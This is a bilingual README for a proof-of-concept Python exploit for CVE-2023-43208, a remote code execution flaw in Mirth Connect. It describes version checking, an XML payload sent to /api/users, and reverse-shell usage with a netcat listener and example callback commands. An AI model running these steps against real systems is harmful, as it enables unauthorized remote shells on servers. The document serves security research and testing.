
PoC for CVE-2023-43208 RCE exploitation.
针对 Mirth Connect 中 CVE-2023-43208 的概念验证 Python 脚本。
仅限在您拥有或明确授权测试的环境中使用。此仓库用于安全研究、验证和防御性测试。作者不对因使用此工具造成的任何误用或损害承担责任。
exp.py 是 PoC 的一个最小依赖版本,它能够:
/api/server/version 请求 Mirth Connect 版本4.4.1/api/users 发送 XML 负载脚本默认使用 HTTPS,可通过 --http 切换为 HTTP。
python3 exp.py -u <目标> -lh <监听主机> -lp <监听端口> [--http]
-u, --url:目标 Mirth Connect URL 或主机-lh, --lhost:用于反向连接的本地主机/IP-lp, --lport:本地监听端口--http:强制使用 HTTP 而非 HTTPS(默认使用 HTTPS)先启动一个监听器:
nc -lvnp 4444
运行脚本:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
对于仅支持 HTTP 的目标:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1 的语义比较。K3ysTr0K3R 和 Chocapikkpredyy